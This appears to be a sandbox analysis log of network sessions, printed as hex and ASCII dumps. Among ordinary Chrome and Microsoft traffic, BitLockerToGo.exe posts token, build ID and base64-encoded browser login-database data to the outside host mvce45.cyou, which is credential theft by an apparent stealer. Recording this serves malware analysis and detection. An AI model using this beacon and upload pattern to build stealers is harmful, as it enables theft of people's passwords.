                                                                                                                                                                                                                                                                                                                  Data Ascii: 20a7)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:20 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                                                                                  Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:20 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                                                                  Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:20 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                                                                                  Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:20 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                                                                                  Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:20 UTC1390INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 35 31 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73
                                                                                                                                                                                                                                                                                                                  Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700251,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var window\u003dthis
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:20 UTC1045INData Raw: 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 49 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 48 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4b 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d
                                                                                                                                                                                                                                                                                                                  Data Ascii: or(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Id\u003dfunction(a){return new _.Hd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Jd\u003dglobalThis.trustedTypes;_.Kd\u003dclass{constructor(a){this.i\u003da}
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:20 UTC400INData Raw: 31 38 39 0d 0a 3b 61 5c 75 30 30 33 64 52 64 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 5c 22 6f 67 62 2d 71 74 6d 23 68 74 6d 6c 5c 22 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 62 2c 63 72 65 61 74 65 53 63 72 69 70 74 3a 62 2c 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 3a 62 7d 29 7d 63 61 74 63 68 28 62 29 7b 7d 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 55 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 54 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 5c 75 30 30 32 36 5c 75 30 30 32 36 28 54 64 5c 75 30 30 33 64 53 64 28 29 29 3b 72 65 74 75 72 6e 20 54 64 7d 3b 5c 6e 5f 2e 57 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 5f 2e 55 64 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20
                                                                                                                                                                                                                                                                                                                  Data Ascii: 189;a\u003dRd.createPolicy(\"ogb-qtm#html\",{createHTML:b,createScript:b,createScriptURL:b})}catch(b){}return a};_.Ud\u003dfunction(){Td\u003d\u003d\u003dvoid 0\u0026\u0026(Td\u003dSd());return Td};\n_.Wd\u003dfunction(a){const b\u003d_.Ud();return new
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:20 UTC1390INData Raw: 38 30 30 30 0d 0a 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4b 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4b 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 5a 64 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 61 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63
                                                                                                                                                                                                                                                                                                                  Data Ascii: 8000return a};_.$d\u003dfunction(a){if(a instanceof _.Kd)if(a instanceof _.Kd)a\u003da.i;else throw Error(\"F\");else a\u003d_.Zd(a);return a};_.ae\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelec
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:20 UTC1390INData Raw: 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6d 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 41 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e
                                                                                                                                                                                                                                                                                                                  Data Ascii: d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.me\u003dfunction(a,b){_.Ab(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d\u003d\"for\"?a.


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  13192.168.2.849728172.217.21.364435904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:19 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:20 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Version: 697903402
                                                                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:20 GMT
                                                                                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:20 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  14192.168.2.84973449.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:22 UTC318OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----BGCAAFHIEBKJKEBFIEHD
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Content-Length: 505
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:22 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 65 66 66 62 30 31 31 61 37 39 63 34 30 35 33 36 61 61 34 61 37 66 31 32 36 37 65 66 66 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 33 35 62 35 63 65 62 38 65 64 30 39 39 35 31 65 62 38 64 35 65 37 37 36 38 31 35 61 64 37 32 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                  Data Ascii: ------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------BGCAAFHIEBKJKEBFIEHDCont
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:24 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:23 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:24 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  15192.168.2.8497382.16.229.162443
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:23 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                                                  Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:23 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                  Server: ECAcc (lpl/EF17)
                                                                                                                                                                                                                                                                                                                  X-CID: 11
                                                                                                                                                                                                                                                                                                                  X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                                                  X-Ms-Region: prod-neu-z1
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=179843
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:23 GMT
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  X-CID: 2


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  16192.168.2.84973949.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:24 UTC320OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----DHJECFCGHIDGHIDHDHIE
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Content-Length: 55081
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:24 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 45 43 46 43 47 48 49 44 47 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 65 66 66 62 30 31 31 61 37 39 63 34 30 35 33 36 61 61 34 61 37 66 31 32 36 37 65 66 66 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 45 43 46 43 47 48 49 44 47 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 33 35 62 35 63 65 62 38 65 64 30 39 39 35 31 65 62 38 64 35 65 37 37 36 38 31 35 61 64 37 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 45 43 46 43 47 48 49 44 47 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                  Data Ascii: ------DHJECFCGHIDGHIDHDHIEContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------DHJECFCGHIDGHIDHDHIEContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------DHJECFCGHIDGHIDHDHIECont
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:24 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                  Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
